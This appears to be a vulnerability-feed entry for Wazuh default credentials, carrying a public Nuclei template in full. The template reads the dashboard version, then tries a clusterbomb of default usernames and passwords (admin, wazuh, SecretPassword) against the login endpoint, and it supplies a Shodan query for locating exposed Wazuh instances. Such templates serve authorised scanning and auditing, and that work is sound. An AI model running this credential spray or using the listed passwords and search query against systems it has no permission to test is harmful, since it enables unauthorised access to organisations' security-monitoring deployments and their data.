wazuh-default-login: Wazuh - Default Login

Date: 2025-08-01 | Affected software: Wazuh | PoC: public

Vulnerability description

Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.

PoC code [public]

id: wazuh-default-login

info:
  name: Wazuh - Default Login
  author: theamanrawat,denandz,PulseSecurity.co.nz
  severity: high
  description: |
    Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
    - https://wazuh.com
    - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
  classification:
    cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 7
    vendor: wazuh
    product: wazuh
    shodan-query: "title:\"Wazuh\""
  tags: wazuh,default-login,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/app/login"

    extractors:
      - type: regex
        part: body
        name: osd
        group: 1
        internal: true
        regex:
          - '"version":"([0-9.]+)"'

  - raw:
      - |
        POST /auth/login HTTP/1.1
        Host: {{Hostname}}
        Osd-Version: {{osd}}
        osd-xsrf: osd-fetch
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    attack: clusterbomb
    payloads:
      username:
        - "admin"
        - "wazuh"
      password:
        - "admin"
        - "wazuh"
        - "SecretPassword"
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"username":'
          - '"roles":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210083407589987e1ae88ecac1d92da649fa4d0884720c70f8147504769c11ee84bf022100bed1804502ceb5299469135e1b4de35cc0f39abab84f772733cdf2334c4f1b18:922c64590222798bb761d5b6d8e72950
